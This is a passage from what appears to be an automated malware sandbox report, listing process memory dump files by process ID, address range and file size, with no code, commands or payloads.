                                                        11.1MB

                                                      • memory/1176-4317-0x0000024D37120000-0x0000024D371DA000-memory.dmp

                                                        Filesize

                                                        744KB

                                                      • memory/1176-4318-0x0000024D371E0000-0x0000024D37292000-memory.dmp

                                                        Filesize

                                                        712KB

                                                      • memory/1176-4329-0x0000024D3C090000-0x0000024D3C0C8000-memory.dmp

                                                        Filesize

                                                        224KB

                                                      • memory/1176-4322-0x0000024D38D60000-0x0000024D38DDE000-memory.dmp

                                                        Filesize

                                                        504KB

                                                      • memory/1176-4323-0x0000000180000000-0x0000000180B0D000-memory.dmp

                                                        Filesize

                                                        11.1MB

                                                      • memory/1176-4325-0x0000000180000000-0x0000000180B0D000-memory.dmp

                                                        Filesize

                                                        11.1MB

                                                      • memory/1176-4326-0x0000000180000000-0x0000000180B0D000-memory.dmp

                                                        Filesize

                                                        11.1MB

                                                      • memory/2756-4436-0x00007FFE05060000-0x00007FFE05061000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2756-4435-0x00007FFE04AB0000-0x00007FFE04AB1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/3216-51-0x00000000028E0000-0x00000000028EE000-memory.dmp

                                                        Filesize

                                                        56KB

                                                      • memory/3216-59-0x0000000002AB0000-0x0000000002ABA000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/3216-52-0x0000000002910000-0x000000000292C000-memory.dmp

                                                        Filesize

                                                        112KB

                                                      • memory/3216-53-0x0000000002AD0000-0x0000000002B20000-memory.dmp

                                                        Filesize

                                                        320KB

                                                      • memory/3216-54-0x0000000002930000-0x0000000002938000-memory.dmp

                                                        Filesize

                                                        32KB

                                                      • memory/3216-78-0x000000001BA40000-0x000000001BB42000-memory.dmp

                                                        Filesize

                                                        1.0MB

                                                      • memory/3216-55-0x0000000002940000-0x0000000002956000-memory.dmp

                                                        Filesize

                                                        88KB

                                                      • memory/3216-50-0x0000000000640000-0x00000000007C4000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/3216-60-0x0000000002AC0000-0x0000000002ACC000-memory.dmp

                                                        Filesize

                                                        48KB

                                                      • memory/3216-56-0x0000000002A80000-0x0000000002A90000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/3216-57-0x0000000002A90000-0x0000000002A9E000-memory.dmp

                                                        Filesize

                                                        56KB

                                                      • memory/3216-58-0x0000000002AA0000-0x0000000002AAE000-memory.dmp

                                                        Filesize

                                                        56KB

                                                      • memory/3700-31-0x0000000000390000-0x00000000003F2000-memory.dmp

                                                        Filesize

                                                        392KB

                                                      • memory/3700-29-0x0000000073C2E000-0x0000000073C2F000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/3700-37-0x0000000004D80000-0x0000000004DE6000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/3700-36-0x0000000004CB0000-0x0000000004D42000-memory.dmp

                                                        Filesize

                                                        584KB

                                                      • memory/3700-34-0x0000000005330000-0x00000000058D4000-memory.dmp

                                                        Filesize

                                                        5.6MB

                                                      • memory/3728-4527-0x00000229CB340000-0x00000229CB3EC000-memory.dmp

                                                        Filesize

                                                        688KB

                                                      • memory/3728-4355-0x00007FFE047C0000-0x00007FFE047C1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4028-32-0x0000000000810000-0x00000000008DE000-memory.dmp

                                                        Filesize

                                                        824KB

                                                      • memory/4028-609-0x0000000073C20000-0x00000000743D0000-memory.dmp

                                                        Filesize

                                                        7.7MB

                                                      • memory/4028-4301-0x0000000073C20000-0x00000000743D0000-memory.dmp

                                                        Filesize

                                                        7.7MB

                                                      • memory/4028-2845-0x0000000006990000-0x00000000069A2000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/4028-35-0x0000000073C20000-0x00000000743D0000-memory.dmp

                                                        Filesize

                                                        7.7MB

                                                      • memory/4028-2796-0x0000000006960000-0x000000000696A000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/4044-4477-0x00007FFE047C0000-0x00007FFE047C1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4044-4528-0x0000015E88480000-0x0000015E8852C000-memory.dmp

                                                        Filesize

                                                        688KB

                                                      • memory/4436-319-0x000000001C850000-0x000000001CA12000-memory.dmp

                                                        Filesize

                                                        1.8MB

                                                      • memory/4436-320-0x000000001D250000-0x000000001D778000-memory.dmp

                                                        Filesize

                                                        5.2MB

                                                      • memory/4680-30-0x0000000000400000-0x00000000006F7000-memory.dmp

                                                        Filesize

                                                        3.0MB

                                                      • memory/4784-88-0x000001F98CB00000-0x000001F98CB22000-memory.dmp

                                                        Filesize

                                                        136KB